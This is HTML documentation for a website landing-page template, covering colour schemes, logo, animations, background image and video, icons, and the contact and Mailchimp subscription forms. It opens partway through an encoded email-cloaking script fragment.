1d%24%28%17%2f%5a%16%2b%27%1c%2e%32%1d%2e%55%19%25%28%18%22%30%17%28%31%1c%2e%5d%16%2a%23%1b%2b%55%1f%25%29%1d%28%5e%1d%22%5b%17%28%34%16%2c%22%1c%2f%58%1d%2f%25%19%23%37%18%22%2f%17%2e%33%1c%2f%2c%16%2b%55%1b%2c%3b%1f%23%31%1d%2f%5d%1d%25%35%17%28%59%16%2d%56%1c%29%32%1d%29%52%19%24%59%18%25%2a%17%2e%2c%1c%2f%28%16%2d%39%1b%2c%55%1f%24%30%1d%2f%5e%1d%24%28%17%2f%5a%16%2b%27%1c%2f%58%1d%2f%27%19%25%28%18%22%30%17%28%31%1c%2e%5d%16%2a%24%1b%2b%57%1f%25%29%1d%28%5e%1d%22%5b%17%28%34%16%2c%22%1c%2f%58%1d%2f%25%19%25%29%18%25%2b%17%2c%62%1c%2f%2f%16%2b%56%1b%2b%69%1f%38%28%1d%33%32%1d%24%37%17%2e%28%16%2a%53%1c%28%58%1d%2f%24%19%24%5b%18%39%31%17%33%28%1c%2f%2f%16%2c%57%1b%2d%27%1f%22%33%1d%2e%29%1d%39%35%17%29%29%16%2d%55%1c%2e%29%1d%32%69%19%25%2f%18%23%60%17%29%32%1c%28%32%16%2b%56%1b%2b%69%1f%38%31%1d%2c%59%1d%26%5b%17%34%58%16%30%54%1c%32%29%1d%32%22%19%25%2f%2c%23%2f%25%30%31%32%2c%1d%24%28%17%29%29%16%2d%22%1c%2f%2e%1d%2f%3a%19%25%36%18%24%30%29%19%27%19%6d%6a%56%6b%55%5f%6d%56%22%29%1c%2e%32%1d%2e%3a%19%24%37%18%24%5c%29%20%21%36%05%06%20%2f%12%23%20%31%07%0c%35%2b%6e%5f%6e%6a%6c%66%3c%00%0d%36%60%6a%6f%5e%6e%61%63%68%30%32%64%31%44%53%73%59%6e%5f%6e%6a%6c%66%1e%6b%56%6b%67%60%6e%5c%5c%34%20%65%30%32%2e%61%69%65%5e%6e%60%68%6c%3112523713%33%32%33%32%32%39%36' + unescape('%27%29%29%3b'));
// -->
</script>
<noscript><i>Javascript required</i></noscript>
	
	<section id="structure">
	<div class="page-header"><h3>Structure</h3><hr class="notop"></div>
<p>
	All files and folder organized nicely.</p>
<p>
	<img alt="" src="assets/images/image_2.jpg"></p>
</section>
<section id="change_color">
	<div class="page-header"><h3>Change Color</h3><hr class="notop"></div>
<p>
	Check <strong>&lt;head&gt; </strong>part of the <strong>index.html</strong>. You will find all colors link available. <strong>blue color is active</strong>. So if you want to use any other color just replace the &quot;blue&quot; with that color name. or you can remove the comment make other color active.</p>
<pre class="prettyprint lang-html linenums">
&lt;!-- COLORS --&gt;

&lt;link rel=&quot;stylesheet&quot; href=&quot;css/colors/blue.css&quot;&gt; &lt;!-- DEFAULT COLOR/ CURRENTLY USING --&gt;

&lt;!-- &lt;link rel=&quot;stylesheet&quot; href=&quot;css/colors/red.css&quot;&gt; --&gt;

&lt;!-- &lt;link rel=&quot;stylesheet&quot; href=&quot;css/colors/green.css&quot;&gt; --&gt;

&lt;!-- &lt;link rel=&quot;stylesheet&quot; href=&quot;css/colors/purple.css&quot;&gt; --&gt;

&lt;!-- &lt;link rel=&quot;stylesheet&quot; href=&quot;css/colors/orange.css&quot;&gt; --&gt;

&lt;!-- &lt;link rel=&quot;stylesheet&quot; href=&quot;css/colors/blue-munsell.css&quot;&gt; --&gt;

&lt;!-- &lt;link rel=&quot;stylesheet&quot; href=&quot;css/colors/slate.css&quot;&gt; --&gt;

&lt;!-- &lt;link rel=&quot;stylesheet&quot; href=&quot;css/colors/yellow.css&quot;&gt; --&gt;</pre>
<p>&nbsp;
	</p>
<p>
	<strong>Screenshot:</strong></p>
<p>
	<strong><img alt="" src="assets/images/image_3.jpg"></strong></p>
</section>
<section id="top_bar_navigation">
	<div class="page-header"><h3>Top Bar Navigation</h3><hr class="notop"></div>
<p>
	New top bar navigation added in v1.4</p>
<p>
	<img alt="" src="assets/images/image_25.jpg"></p>
<p>&nbsp;
	</p>
<p>&nbsp;
	</p>
</section>
<section id="change_logo">
	<div class="page-header"><h3>Change Logo</h3><hr class="notop"></div>
<p>
	It&#39;s very easy to change your logo. Just take a look at the below screenshot. Change the image link to your own logo.</p>
<p>
	<img alt="" src="assets/images/image_4.jpg"></p>
</section>
<section id="animations">
	<div class="page-header"><h3>Animations</h3><hr class="notop"></div>
<h3 style="margin: 18px 0px 0px; padding: 0px; border: 0px; outline: 0px; font-weight: 100; font-size: 26px; font-family: Arial, verdana, arial, sans-serif; vertical-align: baseline; color: rgb(56, 56, 56);">
	I used&nbsp;<a href="http://mynameismatthieu.com/WOW/docs.html" style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-weight: inherit; font-style: inherit; font-family: inherit; vertical-align: baseline; color: rgb(0, 140, 158); text-decoration: none; cursor: pointer;">WOW</a>&nbsp;plugin to trigger animations on scroll. It used&nbsp;<a href="http://daneden.me/animate/" style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-weight: inherit; font-style: inherit; font-family: inherit; vertical-align: baseline; color: rgb(0, 140, 158); text-decoration: none; cursor: pointer;">Animate.css</a>&nbsp;for CSS animation. You will find all of the animations in&nbsp;<a href="http://daneden.me/animate/" style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-weight: inherit; font-style: inherit; font-family: inherit; vertical-align: baseline; color: rgb(0, 140, 158); text-decoration: none; cursor: pointer;">Animate.css</a>&nbsp;website. To learn more about WOW please read their&nbsp;<u><a href="http://mynameismatthieu.com/WOW/docs.html" style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-weight: inherit; font-style: inherit; font-family: inherit; vertical-align: baseline; color: rgb(0, 140, 158); text-decoration: none; cursor: pointer;">Documentation</a></u></h3>
<p>&nbsp;
	</p>
<p>
	<strong>Example:</strong></p>
<pre class="prettyprint lang-html linenums">
&lt;div class=&quot;wow bounceInUp&quot;&gt; Content to Reveal Here &lt;/div &gt;</pre>
<p>&nbsp;
	</p>
<p>
	<strong>Screenshot:</strong></p>
<p>
	<strong><img alt="" src="assets/images/image_5.jpg"></strong></p>
</section>
<section id="background_image">
	<div class="page-header"><h3>Background: Image</h3><hr class="notop"></div>
<p>
	3 Images used in 3 sections. Header, Testimonials and Download section.</p>
<p>
	Find this 3 sections in&nbsp;<strong>styles.css</strong></p>
<p>&nbsp;
	</p>
<p>
	<strong>Header BG:</strong></p>
<p>
	<strong><img alt="" src="assets/images/image_6.jpg"></strong></p>
<p>&nbsp;
	</p>
<p>
	<strong>Testimonials BG:&nbsp;</strong></p>
<p>
	<strong><img alt="" src="assets/images/image_7.jpg"></strong></p>
<p>&nbsp;
	</p>
<p>
	<strong>Download section BG:</strong></p>
<p>
	<strong><img alt="" src="assets/images/image_8.jpg"></strong></p>
<p>&nbsp;
	</p>
<p>
	And there is a transparent black color overlay to make content more visible. You will find it on&nbsp;<strong>css/colors/your_selected_color.css</strong></p>
<p>
	<strong><img alt="" src="assets/images/image_9.jpg"></strong></p>
</section>
<section id="background_transparent_color">
	<div class="page-header"><h3>Background: Transparent color</h3><hr class="notop"></div>
<p>
	<strong>Same as background image version</strong>. 3 Images used in 3 sections. Header, Testimonials and Download section.</p>
<p>
	Find this 3 sections in&nbsp;<strong>styles.css</strong></p>
<p>&nbsp;
	</p>
<p>
	<strong>Header BG:</strong></p>
<p>
	<strong><img alt="" src="assets/images/image_6.jpg"></strong></p>
<p>&nbsp;
	</p>
<p>
	<strong>Testimonials BG:&nbsp;</strong></p>
<p>
	<strong><img alt="" src="assets/images/image_7.jpg"></strong></p>
<p>&nbsp;
	</p>
<p>
	<strong>Download section BG:</strong></p>
<p>
	<strong><img alt="" src="assets/images/image_8.jpg"></strong></p>
<p>&nbsp;
	</p>
<h5 id="background_transparent_color_trasparent_color_overlay">
	Trasparent color overlay:</h5>
<p>
	And there is a transparent black color overlay to make content more visible. You will find it on&nbsp;<strong>css/colors/your_selected_color.css</strong></p>
<p>
	<strong><img alt="" src="assets/images/image_10.jpg"></strong></p>
</section>
<section id="background_solid_color">
	<div class="page-header"><h3>Background: Solid Color</h3><hr class="notop"></div>
<p>
	You will find solid color class on&nbsp;<strong>css/colors/your_selected_color.css</strong>. You can change how you want.&nbsp;</p>
<p>
	<img alt="" src="assets/images/image_11.jpg"></p>
</section>
<section id="background_video">
	<div class="page-header"><h3>Background: Video</h3><hr class="notop"></div>
<p>
	It&#39;s very easy to change the background video.&nbsp;</p>
<p>&nbsp;
	</p>
<p>
	1.&nbsp;&nbsp;Just go to the&nbsp;<strong>video</strong>&nbsp;folder:</p>
<p>
	<img alt="" src="assets/images/image_12.jpg"></p>
<p>
	2. You will find the videos in 3 formats.&nbsp;<strong>.mp4&nbsp;.ogg&nbsp;</strong>and&nbsp;<strong>.webm</strong>&nbsp;. And a&nbsp;<strong>JPG</strong>&nbsp;image. You can convert your videos in this 3 format very easily via&nbsp;<a href="http://video.online-convert.com/">http://video.online-convert.com/</a>&nbsp;. Convert your video int this 3 format and replace the old videos and JPG screenshots.&nbsp;</p>
<p>
	<img alt="" src="assets/images/image_13.jpg"></p>
<p>
	<strong>NOTE:&nbsp;</strong>If your filename is not &quot;video&quot; and has a dfferent name. You can change it on JS in&nbsp;<strong>custom.js</strong>&nbsp;file. available on JS folder.</p>
<p>
	<img alt="" src="assets/images/image_14.jpg"></p>
<p>&nbsp;
	</p>
<h4 id="background_video_image_background_for_mobile">Image background for mobile</h4>
<hr>
<p>
	For better performance in mobile. In latest version an image will show in background instead of video on mobile. You can change the background image from <strong>css/responsive.css</strong></p>
<p>&nbsp;
	</p>
<p>
	<img alt="" src="assets/images/image_21.jpg"></p>
<p>
	Currently all devices under <strong>640px width&nbsp;</strong>will show the background image instead of video. If you want change this please edit <strong>js/custom.js .&nbsp;</strong>If you want to use background image instead of video on tablet. use min-width: 768px; also change it on responsive.css (max-width: 640px)</p>
<p>
	<strong><img alt="" src="assets/images/image_15.jpg"></strong></p>
</section>
<section id="icons">
	<div class="page-header"><h3>Icons</h3><hr class="notop"></div>
<p style="margin: 18px 0px; padding: 0px; border: 0px; outline: 0px; font-family: Arial, verdana, arial, sans-serif; vertical-align: baseline; line-height: 1.5em; color: rgb(56, 56, 56);">
	I used 360 font icons set from&nbsp;<a href="http://www.elegantthemes.com/blog/resources/elegant-icon-font" style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-weight: inherit; font-style: inherit; font-family: inherit; vertical-align: baseline; color: rgb(0, 140, 158); text-decoration: none; cursor: pointer;">Elegantthemes</a></p>
<p style="margin: 18px 0px; padding: 0px; border: 0px; outline: 0px; font-family: Arial, verdana, arial, sans-serif; vertical-align: baseline; line-height: 1.5em; color: rgb(56, 56, 56);">
	It&#39;s very easy to use the icons. Just use the icon&#39;s class name from&nbsp;<a href="icons-mapping.html" style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-weight: inherit; font-style: inherit; font-family: inherit; vertical-align: baseline; color: rgb(0, 140, 158); text-decoration: none; cursor: pointer;">Icons Mapping</a></p>
<p style="margin: 18px 0px; padding: 0px; border: 0px; outline: 0px; font-family: Arial, verdana, arial, sans-serif; vertical-align: baseline; line-height: 1.5em; color: rgb(56, 56, 56);">
	<strong>Example:</strong></p>
<pre class="prettyprint lang-html linenums">
&lt;i class=&quot;icon_camera_alt&quot;&gt;&lt;/i&gt;</pre>
<p>&nbsp;
	</p>
<h3 style="margin: 18px 0px 0px; padding: 0px; border: 0px; outline: 0px; font-weight: 100; font-size: 26px; font-family: Arial, verdana, arial, sans-serif; vertical-align: baseline; color: rgb(56, 56, 56);">
	Check&nbsp;<a href="icons-mapping.html" style="margin: 0px; padding: 0px; border: 0px; outline: 0px; font-weight: inherit; font-style: inherit; font-family: inherit; vertical-align: baseline; color: rgb(0, 140, 158); text-decoration: none; cursor: pointer;">All Icons Classes</a></h3>
</section>
<section id="screenshots">
	<div class="page-header"><h3>Screenshots</h3><hr class="notop"></div>
<p>
	Just change the image links to your desired screenshots url. That&#39;s all.&nbsp;</p>
<p>
	<img alt="" src="assets/images/image_16.jpg"></p>
<p>&nbsp;
	</p>
<h3 id="screenshots_i_used_nivo_lightbox_and_owl_carousel_in_this_section_if_you_wanna_learn_more_about_their_options_and_features_please_read_doc_a_href">
	I used nivo lightbox and owl carousel in this section. If you wanna learn more about their options and features. Please read doc:&nbsp;<a href="http://docs.dev7studios.com/jquery-plugins/nivo-lightbox">Nivo Lightbox</a>&nbsp;-&nbsp;<a href="http://owlgraphic.com/owlcarousel/">Owl Carousel&nbsp;</a></h3>
</section>
<section id="contact_form">
	<div class="page-header"><h3>Contact Form</h3><hr class="notop"></div>
<p>
	Contact form will use php to send emails. So just open&nbsp;<strong>sendmail.php</strong>&nbsp;file. Change the current email &#115;&#112;&#97;&#109;&#98;&#111;&#120;&#64;&#100;&#101;&#115;&#105;&#103;&#110;&#108;&#97;&#98;&#46;&#99;&#111; to your email address. Your form is ready.</p>
<div class="alert alert-info">
	(NOTE: Contact form require web server to send email. Emails can go to your spam/junk folder.)</div>
<div>
	&nbsp;</div>
<div>
	&nbsp;</div>
<div>
	<img alt="" src="assets/images/image_17.jpg"></div>
</section>
<section id="subscription_form">
	<div class="page-header"><h3>Subscription Form</h3><hr class="notop"></div>
<h3>
	Default: Mailchimp</h3>
<p>
	Current active subscribe form will save emails to mail chimp list.&nbsp;</p>
<p>&nbsp;
	</p>
<p>
	<strong>How to connect mail chimp list?&nbsp;</strong></p>
<p>
	Open <strong>custom.js </strong>and find following script. Just replace that mailchimp form action url with your mailchimp list url</p>
<p>
	<img alt="" src="assets/images/image_22.jpg"></p>
<p>&nbsp;
	</p>
<p>
	<strong>How to find mailchimp form action URL?</strong></p>
<p>
	Just go to your mailchimp account. Then your list. Then&nbsp;<strong>Signup forms. </strong>Select<strong>&nbsp;&nbsp;Embedded forms.&nbsp;</strong>You will find form action URL in this page.&nbsp;</p>
<p>
	<img alt="" src="assets/images/image_23.jpg"></p>
<p>&nbsp;
	</p>
<h3>
	Option 2: Save emails in text</h3>
<p>
	This option currently disabled with HTML comment. Just remove the HTML comment you it will be enabled.&nbsp;</p>
<p>
	<img alt="" src="assets/images/image_24.jpg"></p>
<p>
	This Subscription form will save the <strong>emails</strong> in <strong>email-list.txt&nbsp;</strong>on <strong>subscribe folder</strong></p>
<p>
	<img alt="" src="assets/images/image_19.jpg"></p>
<p>
	<img alt="" src="assets/images/image_20.jpg"></p>
<p>
	Email will saved with a <strong>comma&nbsp;</strong>at the end of every email address. also every email address will be in a new line.&nbsp;</p>
<p>
	<img alt="" src="assets/images/image_18.jpg"></p>
<p>&nbsp;
	</p>
<p>&nbsp;
	</p>
</section>
<section id="support_and_credits">
	<div class="page-header"><h3>Support and Credits</h3><hr class="notop"></div>
<p>
	If you need any help. Feel free to contact me anytime. I will reply in 72 hours.&nbsp;</p>
<p>
	Email:&nbsp;<strong><a href="http://themeforest.net/user/R_Miz">Send email from My profile on ThemeForest</a></strong></p>
<p>
	<a href="http://facebook.com/rexmizan">Facebook</a>&nbsp;|&nbsp;<a href="http://twitter.com/rexmizan">Twitter&nbsp;</a></p>
<p>&nbsp;
	</p>
<h4 id="support_and_credits_credits">Credits:</h4>
<p>
	Images from&nbsp;<a href="http://unsplash.com/">unsplash.com</a></p>
<p>
	Mockups from&nbsp;<a href="http://pixeden.com/">pixeden.com</a>&nbsp;and&nbsp;<a href="http://elegantthemes.com/">elegantthemes.com</a></p>
<p>
	Video converted via&nbsp;<a href="http://video.online-convert.com/">video.online-convert.com</a></p>
<p>
	App screenshots from&nbsp;<a href="http://dribbble.com/OliaGozha">http://dribbble.com/OliaGozha</a></p>
</section>

	</div>
</body>
</html>